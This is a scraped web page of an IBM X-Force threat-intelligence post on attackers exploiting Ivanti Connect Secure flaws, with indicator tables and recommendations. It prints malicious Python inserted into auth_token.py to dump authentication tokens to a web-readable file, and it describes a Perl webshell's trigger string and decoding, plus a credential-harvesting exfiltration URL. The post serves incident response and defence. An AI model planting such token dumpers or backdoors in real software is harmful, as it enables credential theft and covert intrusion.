1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IPv4</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Observed scanning for vulnerable Ivanti appliances</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">122.167.210.185</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IPv4</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Observed scanning for vulnerable Ivanti appliances</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">194.233.171.172</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IPv4</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Observed scanning for vulnerable Ivanti appliances</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">178.17.169.243</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IPv4</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IP belonging to Pure VPN, observed scanning for vulnerable Ivanti appliances</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">178.17.169.244</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IPv4</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IP belonging to Pure VPN, observed scanning for vulnerable Ivanti appliances</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">178.17.169.233</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IPv4</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IP belonging to Pure VPN, observed scanning for vulnerable Ivanti appliances</p> </td> </tr> </tbody> </table>" } </script>  <script id="post-schema" type="application/ld+json"> { "@context": "https://schema.org", "@type": "BreadcrumbList", "itemListElement": [ { "@type": "ListItem", "position": 1, "name": "Home", "item": "https://securityintelligence.com/" }, ] } </script> <div id="progressbar"> <amp-animation id="progress-animation" layout="nodisplay"> <script type="application/json"> { "duration": "1s", "iterations": "1", "fill": "both", "direction": "alternate", "animations": [{ "selector": "#progressbar", "keyframes": [{ "transform": "translateX(0)" }] }] } </script> </amp-animation> </div> <amp-position-observer target="post__content" intersection-ratios="0" viewport-margins="25vh 75vh" on="scroll:progress-animation.seekTo(percent=event.percent)" layout="nodisplay"></amp-position-observer> <div class="dark_background" style="background:black;"></div> <div class="container grid" style="background:black;">  <aside class="breadcrumbs "> <h1 class="breadcrumbs__page_title">Widespread exploitation of recently disclosed Ivanti vulnerabilities</h1> </aside> </div> <div class="container grid hero_background "> <div class="grid__content post "> <div class="post__thumbnail"> <amp-img alt="Closeup on a blue circuit board with an orange padlock in the center" width="1200" height="630" layout="responsive" src="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/02/Lock-sign-4-630x330.jpeg.webp" srcset="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/02/Lock-sign-4-300x158.jpeg.webp 300w, /wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/02/Lock-sign-4-630x330.jpeg.webp 630w, /wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/02/Lock-sign-4.jpeg.webp 1200w, /wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/02/Lock-sign-4.jpeg.webp 2400w"> <amp-img fallback alt="Closeup on a blue circuit board with an orange padlock in the center" width="1200" height="630" layout="responsive" src="https://securityintelligence.com/wp-content/uploads/2024/02/Lock-sign-4-630x330.jpeg" srcset="https://securityintelligence.com/wp-content/uploads/2024/02/Lock-sign-4-300x158.jpeg 300w, https://securityintelligence.com/wp-content/uploads/2024/02/Lock-sign-4-630x330.jpeg 630w, https://securityintelligence.com/wp-content/uploads/2024/02/Lock-sign-4.jpeg 1200w, https://securityintelligence.com/wp-content/uploads/2024/02/Lock-sign-4.jpeg 2400w"> </amp-img> </amp-img> </div> <div class="new_categoy"> <div class="category-container"> <div class="category"> <div class="theme"> <div class="form-check form-switch"> <div class="link-container"> <a href="#" class="theme-link" id="light-theme-link">Light</a> <a href="#" class="theme-link" id="dark-theme-link">Dark</a> </div> </div> </div> <hr class="separator"> <div class="author_date"> <div class="information"> <span class="date">February 23, 2024</span> <span class="author_category">By <a href="https://securityintelligence.com/author/richard-emerson/" >Richard Emerson</a> <span class="author_comma"></span><br>   <a href="https://securityintelligence.com/author/kevin-snider/">Kevin Snider</a> <span class="author_comma"></span><br> <a href="https://securityintelligence.com/author/charlotte-hammond/">Charlotte Hammond</a> <span class="author_comma"></span><br> <a href="https://securityintelligence.com/author/ruben-castillo/">Ruben Castillo</a> <br> </span> <span class="author_category"><span class="span-reading-time rt-reading-time"><span class="rt-label rt-prefix"></span> <span class="rt-time"> 6</span> <span class="rt-label rt-postfix">min read</span></span></span> </div> </div> <hr class="separator"> <div class="title"> <a href="https://securityintelligence.com/category/x-force/threat-intelligence/"><span class="name_category">Threat Intelligence<br> </span></a> </div> <div class="social-container" style="visibility: hidden;"> <hr class="separator"> <div class="social">  <a href="https://twitter.com/intent/tweet?text=Widespread exploitation of recently disclosed Ivanti vulnerabilities&url=https://securityintelligence.com/x-force/exploitation-of-exposed-ivanti-vulnerabilities/" target="_blank" rel="noopener noreferrer"><amp-img class="arrow" layout="fixed" height="26" width="26" src="https://securityintelligence.com/wp-content/themes/sapphire/images/social-icons/twitter.svg" alt="twitter"></amp-img></a> <a href="https://www.linkedin.com/shareArticle?url=https://securityintelligence.com/x-force/exploitation-of-exposed-ivanti-vulnerabilities/" target="_blank" rel="noopener noreferrer"><amp-img class="arrow" layout="fixed" height="26" width="26" src="https://securityintelligence.com/wp-content/themes/sapphire/images/social-icons/linkedin.svg" alt="Linkedin" ></amp-img></a> <a href="https://www.facebook.com/sharer/sharer.php?u=https://securityintelligence.com/x-force/exploitation-of-exposed-ivanti-vulnerabilities/" target="_blank" rel="noopener noreferrer"><amp-img class="arrow" layout="fixed" height="26" width="26" src="https://securityintelligence.com/wp-content/themes/sapphire/images/social-icons/facebook.svg" alt="facebook"></amp-img></a> <a href="https://securityintelligence.com/x-force/exploitation-of-exposed-ivanti-vulnerabilities/" target="_blank" rel="noopener noreferrer"><amp-img class="arrow" layout="fixed" height="26" width="26" src="https://securityintelligence.com/wp-content/themes/sapphire/images/social-icons/link.svg" alt="An arrow pointing up"></amp-img></a> </div> </div> </div> <script> window.addEventListener('scroll', function() { var category = document.querySelector('.category'); var scrollPosition = window.scrollY; if (scrollPosition >= 0) { category.classList.add('sticky'); } else { category.classList.remove('sticky'); } }); // Function to set the light theme function setLightTheme(event, toSaveLocalStorage = true) { event.preventDefault(); const body = document.body; body.classList.remove('dark-theme'); // Save the user's theme preference in localStorage if (toSaveLocalStorage && !location.href.includes("/x-force/")) { setSiTheme('light'); } } // Function to set the dark theme function setDarkTheme(event, toSaveLocalStorage = true) { event.preventDefault(); const body = document.body; body.classList.add('dark-theme'); // Save the user's theme preference in localStorage if (toSaveLocalStorage && !location.href.includes("/x-force/")) { setSiTheme('dark'); } } // Add click event listeners to the theme links document.getElementById('light-theme-link').addEventListener('click', (event) => setLightTheme(event)); document.getElementById('dark-theme-link').addEventListener('click', (event) => setDarkTheme(event)); // Check localStorage to set the initial theme preference const themePreference = localStorage.getItem('si-theme-mode'); // Function to simulate a click event function simulateClick(handler, toSaveLocalStorage) { const event = new Event('click'); handler(event, toSaveLocalStorage); } // Apply the correct theme based on URL and preference if (location.href.includes("/x-force/")) { simulateClick(setDarkTheme, false); // Apply the dark theme for all x-force posts } else if (themePreference === 'dark') { simulateClick(setDarkTheme, true); // Apply the dark theme based on user preference } else if (themePreference === 'light') { simulateClick(setLightTheme, true); // Apply the light theme based on user preference (default) } else { simulateClick(setLightTheme, true); // Apply the light theme by default } </script> <script> const cookies = JSON.parse(localStorage.getItem("truste.eu.cookie.notice_preferences")); if (cookies && cookies.value === '2:') { document.querySelector('.social-container').style.visibility = 'visible'; } </script> </div> <main class="post__content post__content--continue_reading" id="post__content"> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <html><body><p>IBM X-Force has assisted several organizations in responding to successful compromises involving the Ivanti appliance vulnerabilities disclosed in January 2024. Analysis of these incidents has identified several Ivanti file modifications that align with current public reporting. Additionally, IBM researchers have observed specific attack techniques involving the theft of authentication token data not readily noted in current public sources. The blog details the results of this research to assist organizations in protecting against these threats.</p> <h2>Key Findings</h2> <ul type="disc"> <li>IBM research teams have directly observed the DSLog backdoor <a href="https://www.orangecyberdefense.com/fileadmin/general/pdf/Ivanti_Connect_Secure_-_Journey_to_the_core_of_the_DSLog_backdoor.pdf" target="_blank" rel="noopener nofollow" >reported </a>in active real-world cyber attacks</li> <li>X-Force also identified modifications to the Ivanti “auth_token.py” file to dump authentication token data to another file, presumably for exfiltration–this observation is distinct from other vendors</li> <li>Organizations can leverage several potential data sources when investigating potential Ivanti appliance compromises.</li> </ul> <h2>Overview</h2> <p>IBM X-Force has been monitoring the evolving campaigns leveraging recently disclosed Ivanti zero days. Initial disclosure by Ivanti was published on January 10th, 2024 and detailed CVE-2023-46805 and CVE-2024-21887 impacting Ivanti Connect Secure and Policy Secure appliances. CVE-2023-46805 pertains to an authentication bypass vulnerability permitting a remote attacker to access restricted resources. The other vulnerability, CVE-2024-21887, is a remote code execution/injection (RCE) vulnerability permitting an authenticated administrator to execute arbitrary commands by sending specially crafted packets. Public <a href="https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day" target="_blank" rel="noopener nofollow" >reporting</a> indicates a threat actor exploited these vulnerabilities against select targets as early as December 2023.</p> <p>Multiple vendors have attributed the initial intrusions to a suspected Chinese threat actor tracked as UTA0178 (aka UNC5221). X-Force is currently unable to corroborate this reporting with sufficient confidence to comment. On January 11th and 12th, following the publication of these vulnerabilities, <a href="https://www.volexity.com/blog/2024/01/15/ivanti-connect-secure-vpn-exploitation-goes-global/" target="_blank" rel="noopener nofollow" >multiple</a> <a href="https://unit42.paloaltonetworks.com/threat-brief-ivanti-cve-2023-46805-cve-2024-21887/" target="_blank" rel="noopener nofollow" >vendors</a> observed mass scanning and exploitation attempts against various organizations. While UTA0178 was reportedly behind some of this increase in activity, similarities in deployed webshells and non-public methodologies have been reported as evidence that these exploits may have been shared with related <a href="https://www.volexity.com/blog/2024/01/15/ivanti-connect-secure-vpn-exploitation-goes-global/" target="_blank" rel="noopener nofollow" >actors</a>. This proliferation of zero-day exploits similar to the initial campaign/s has been observed in widespread use to opportunistically gain footholds in thousands of organizations before or soon after patches were available. This pattern of activity is consistent with prior campaigns also attributed to suspected Chinese threat <a href="https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/" target="_blank" rel="noopener nofollow" >actors</a>.</p> <p>Starting January 16th, proof of concept (POC) exploit code was released for CVE-2023-46805 and CVE-2024-21887. Ivanti disclosed additional vulnerabilities CVE-2024-21893 and CVE-2024-21887 on January 31st for Ivanti Connect Secure, Policy Secure, and ZTA Gateways, with POC exploit code released on February 2nd. CVE-2024-21893 is an SSRF (Server-Side Request Forgery) vulnerability that may permit access to restricted resources without authentication. CVE-2024-21888 is a privilege escalation vulnerability. As of February 8th, Ivanti had identified an additional vulnerability, CVE-2024-22024, which is a XXE vulnerability in Ivanti Connect Secure, Policy Secure, and ZTA Gateways that allows an attacker to access certain restricted resources with authentication.</p> <p><amp-img src="https://images1.cmp.optimizely.com/Zz03ZjVkMmQ3Y2NjNDQxMWVlYmM3MGNhZmQxMGFkODg1Yw==" layout="intrinsic" class="" alt="remerson_ivanti.png" width="720" height="125.23512747875354" lightbox="lightbox"></amp-img><i>(Major Events Timeline of Ivanti Vulnerabilities)</i></p> <h3>Authentication Token Dumper</h3> <p>X-Force identified threat actor modifications to the file auth_token.py to include code designed to dump authentication token data. This file is part of the Python package cav-0.1-py3.6.egg, and is found at the path: <b>/home/venv3/lib/python3.6/site-packages/cav-0.1-py3.6.egg/cav/api/resources/auth_token.py</b>. The CAV Python package was also targeted by the FRAMESTING, WIREFIRE, and CHAINLINE webshells <a href="https://www.mandiant.com/resources/blog/investigating-ivanti-zero-day-exploitation" target="_blank" rel="noopener nofollow" >observed by Mandiant</a>, however, none of those were reported to target authentication tokens. Our malware analysis team has independently confirmed these particular webshells are being used in combination with the vulnerabilities included in this report.</p> <p>The following code was inserted into auth_token.py:</p> <p data-pm-slice='1 1 ["bullet_list",null,"bullet_list",null,"list_item",null]'><span style="font-size: 10.5pt; line-height: 107%; font-family: Consolas;">from</span> <span style="font-size: 10.5pt; line-height: 107%; font-family: Consolas;">datetime import</span> <span style="font-size: 10.5pt; line-height: 107%; font-family: Consolas;">datetime</span><br> <span style="font-size: 10.5pt; line-height: 107%; font-family: Consolas;">ctime =</span> <span style="font-size: 10.5pt; line-height: 107%; font-family: Consolas;">datetime.now()</span><br> <span style="font-size: 10.5pt; line-height: 107%; font-family: Consolas;">ftime =</span> <span style="font-size: 10.5pt; line-height: 107%; font-family: Consolas;">ctime.strftime(“%Y-%m-%d %H:%M:%S”)</span><br> <span style="font-size: 10.5pt; line-height: 107%; font-family: Consolas;">data_save =</span> <span style="font-size: 10.5pt; line-height: 107%; font-family: Consolas;">{“time”:ftime,”token_hash”:token_hash,”dsid”: dsid, “roles”: roles, “role_ids”: role_ids,”user_name”: user_name}</span><br> <span style="font-size: 10.5pt; line-height: 107%; font-family: Consolas;">with open(“/home/webserver/htdocs/dana-na/auth/qrcod.gif”,”a”) as f:</span><br> <span style="font-size: 10.5pt; line-height: 107%; font-family: Consolas;">    f.write(f”{data_save}\n”)</span></p> <p>This code is designed to write information about the generated authentication token to the file <b>/home/webserver/htdocs/dana-na/auth/qrcod.gif</b></p> <p>The file used (auth_token.py), functionality of the inserted code, and exfiltration path identified by our researchers differ from those reported by other vendors. This may indicate differing tool sets or basic attempts at defense evasion by modifying easily identifiable features used in previous attacks.</p> <h3>DSLog Backdoor</h3> <p>X-Force also identified malicious code for a Perl-based webshell inserted into the legitimate Ivanti file <b>/home/perl/DSLog.pm</b> within a function named <b>Msg</b> which has been named “DSLog Backdoor” by another <a href="https://www.orangecyberdefense.com/fileadmin/general/pdf/Ivanti_Connect_Secure_-_Journey_to_the_core_of_the_DSLog_backdoor.pdf" target="_blank" rel="noopener nofollow" >vendor</a>. A snippet of that function can be seen below, and the lines referencing “webshell code” were inserted for clarity.</p> <p data-pm-slice='1 1 ["bullet_list",null,"bullet_list",null,"list_item",null]'><amp-img src="https://images3.cmp.optimizely.com/Zz1jNWEzODZkZWQyNzgxMWVlYmZiMzY2Y2RiMWY0MTRmMg==" layout="intrinsic" class="" alt="IvantiDisclosure_01-2024_CodeSnip2.png" width="546" height="575.5339805825244" lightbox="lightbox"></amp-img></p> <p>When run, the webshell code retrieves the HTTP request string and user agent from environment variables. It then checks the user agent for the string ‘<b>3f4a8724ab807b4f4f167aa95599d5b25e2c8aa6</b>‘. As noted in <a href="https://www.orangecyberdefense.com/fileadmin/general/pdf/Ivanti_Connect_Secure_-_Journey_to_the_core_of_the_DSLog_backdoor.pdf" target="_blank" rel="noopener nofollow" >OSINT</a>, X-Force has also observed a SHA256 hash used as a string. If this string is present within the user-agent, the webshell processes the request string, which it expects to be formatted as: <b>&cdi=<hex_formatted_string></b>. These indicators have also not been identified in previous public reporting.</p> <p>The webshell decodes the hex string to ASCII and performs a further ROT-47 decoding operation. It then executes the resulting string using the ‘system’ command.</p> <p>In addition to the activity described above, we also observed malicious files that correspond with those described in existing reporting. These include the following:</p> <ul type="disc"> <li><b>/home/webserver/htdocs/dana-na/auth/lastauthserverused.js – </b>We identified credential harvesting code inserted into this legitimate file, which was similar to that observed by Mandiant (as WARPWIRE) and <a href="https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti-connect-secure-vpn/" target="_blank" rel="noopener nofollow" >Volexity</a>. The Login function within the <b>lastauthserverused.js</b> file has been modified to forward login credentials as an HTTP POST request to the URL <b>http[:]//www.ehangmun[.]com/board/selectbox/xml.php</b>.</li> <li><b>/home/venv3/lib/python3.6/site-packages/scanner-0.1-py3.6.egg/scanner/scripts/scanner.py</b> – This is a legitimate file and part of the Integrity Checker Tool. The <b>dumpStats</b> function within the file has been modified to always report zero detected changes. Volexity also observed this behavior.</li> <li><b>/home/venv3/lib/python3.6/site-packages/cav-0.1-py3.6.egg&zwnj;/cav/api/resources/visits.py</b> – This is a legitimate file to which webshell code has been added, and is called when the URI /api/v1/cav/client/visits is accessed. This matches the GIFTEDVISITOR webshell reported on by Volexity.</li> </ul> <h3>Ivanti Appliance Investigation Considerations</h3> <p>In regards to Ivanti appliances, after appropriate containment actions have been taken X-Force recommends organizations leverage the external Ivanti Integrity Check Tool (ICT) to identify potential evidence of compromise. The Ivanti ICT is a utility that is designed to check “the integrity of the complete file system and finds any additional/modified file(s)” for ICS and IPS images installed on virtual or hardware appliances, and has been the fastest way to obtain evidence in X-Force’s experience. As noted above and by <a href="https://www.volexity.com/blog/2024/01/18/ivanti-connect-secure-vpn-exploitation-new-observations/" target="_blank" rel="noopener nofollow" >others</a>, threat actors have modified the built-in ICT to hide evidence of changes on Ivanti appliances, so running the external ICT is recommended. The output of that scan comes in the form of a TGZ file that is contained inside an encrypted “format” with a hardcoded key. While X-Force recommends working with Ivanti to decrypt the output, there is code available on <a href="https://gist.github.com/rxwx/03a036d8982c9a3cead0c053cf334605" target="_blank" rel="noopener nofollow" >GitHub </a>that can assist with decrypting these files, should the need arise. Analysis work should involve investigating the TGZ file directly to ensure all relevant information of interest, particularly time stamps, is properly collected.</p> <p>In addition to the Ivanti ICT tool output, organizations can also capture disk/memory images, as well as collect and review the User Access Log, Event Log, and Administrator Access Log files from the Admin Console. Preservation of evidence can be critical in ensuring the complete eviction of malicious actors. When possible, X-Force recommends organizations collect forensic images before remediation actions are taken, including resetting the appliance. Mitigation efforts may alert threat actors to detection and once the appliance is rebuilt, important evidence is lost. This may include critical data necessary to determine what actions the threat actor may have taken if the device was compromised. Ivanti support may also be required to decrypt these images for analysis.</p> <h2>Conclusion</h2> <p>Remote access solutions continue to remain an attractive target for threat actors looking to gain a foothold in target environments. For the most recent Ivanti appliance zero-days, X-Force has observed threat actors leverage file modifications to steal authentication token data as well as deploying the DSLog webshell to conduct post-compromise activity (particularly in maintaining persistence, lateral movement, and data exfiltration.) X-Force recommends organizations responding to an Ivanti compromise follow the remediation guidance provided by the vendor, while also taking into account forensic collection requirements.</p> <h2>Recommendations</h2> <ul type="disc"> <li>Follow the recommendations noted in the Ivanti Appliance Investigation Considerations section</li> <li>Ensure a backup of the configuration is saved for the appliance before initiating a factory reset</li> <li>Apply official patches from Ivanti to vulnerable appliances</li> <li>Consider revoking and reissuing appliance-related secrets, API keys, and certificates</li> <li>Consider rotating passwords for users that authenticated to the appliance during the timeframe of compromise</li> <li>Forward Ivanti appliance logs to a centralized location to prevent log tampering, particularly the User and Admin Access Logs, and the Events Logs</li> <li>Investigate implementing and/or leveraging a configuration management solution.</li> </ul> <p>An advance copy of this analysis was provided to X-Force Premier Threat Intelligence (PTI) subscription clients on February 7, 2024. To learn how you can gain advanced insight into X-Force Threat Intelligence products, try a <a href="https://www.ibm.com/products/xforce-exchange/editions" >30-day free trial</a> of PTI on <a href="https://exchange.xforce.ibmcloud.com/" target="_blank" rel="noopener nofollow" >X-Force Exchange</a>.</p> <p data-pm-slice="1 1 []"><em>To learn how IBM X-Force can help you with anything regarding cybersecurity including incident response, threat intelligence, or offensive security services </em><a href="https://www.ibm.com/account/reg/us-en/signup?formid=urx-52262" target="_blank" rel="noopener nofollow" ><em>schedule a meeting here</em></a><em>.</em></p> <p><em>If you are experiencing cybersecurity issues or an incident, contact </em><a href="https://www.ibm.com/x-force" target="_blank" rel="noopener nofollow" ><em>X-Force</em></a><em> to help: US hotline </em><em>1-888-241-9812</em><em> | Global hotline (+001) </em><em>312-212-8034</em><em>.</em></p> <table class="ScrollTableNormal" style="border-collapse: collapse; border: none;" border="1" cellspacing="0" cellpadding="0"> <thead> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; background: #F0F0F0; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><b><span style="color: black;">Indicator</span></b></p> </td> <td style="width: 67.7pt; border: solid #DDDDDD 1.0pt; border-left: none; background: #F0F0F0; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><b><span style="color: black;">Indicator Type</span></b></p> </td> <td style="width: 157.95pt; border: solid #DDDDDD 1.0pt; border-left: none; background: #F0F0F0; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><b><span style="color: black;">Context</span></b></p> </td> </tr> </thead> <tbody> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #1d1c1d;">336d22d5a85319bf9e2567b3964fdc5a</span></p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">MD5</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #1d1c1d;">Modified lastauthserverused.js file</span></p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #1d1c1d;">79a1ff16095c2df1356ee9b2d5aeb8b9</span></p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">MD5</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #1d1c1d;">Modified scanner.py file</span></p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #1d1c1d;">094433737d3ff87776c4abae6c91aaaf</span></p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">MD5</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #1d1c1d;">Modified visits.py file</span></p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #1d1c1d;">6806d0735c49bd7351dda964e84e2c01</span></p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">MD5</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #1d1c1d;">Modified auth_token.py file to dump authentication token data</span></p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #1d1c1d;">ae487dcf9219bab971bdc9d6a4ac7022</span></p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">MD5</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; 